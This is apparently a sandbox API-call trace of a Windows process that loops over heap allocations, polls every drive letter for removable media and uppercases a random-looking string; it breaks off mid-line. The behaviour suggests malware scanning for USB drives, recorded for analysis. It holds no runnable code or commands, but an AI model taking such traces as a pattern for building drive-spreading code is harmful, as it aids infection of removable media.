1 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.491] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.492] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.492] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.492] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.493] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.493] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.493] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.493] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.493] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.493] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.494] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.494] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.494] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.494] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.495] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.495] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.495] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.495] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.495] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.496] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.497] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.497] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.497] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.497] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.498] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0218.498] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0218.498] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.498] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.498] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.499] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.499] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.499] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.499] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.500] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.500] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.500] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.500] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.500] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.500] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.501] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.501] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.502] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.502] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.502] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.503] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.503] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.503] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.503] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.503] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.504] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.504] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.504] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.504] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.505] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.505] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.505] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.505] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.505] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.506] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.506] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.506] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.506] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.507] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.507] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0218.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0218.507] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.508] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.508] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.508] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.508] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.508] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.508] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.509] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.509] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.509] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.509] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.510] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.510] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.510] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.519] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.519] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.519] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.519] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.519] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.520] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.520] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.520] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.520] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.520] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.521] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.522] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.522] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.522] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.523] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.523] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.523] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.523] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.523] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.523] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.523] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.524] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0218.524] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.524] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.525] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0218.525] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0218.525] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.525] PeekMessageW (in: 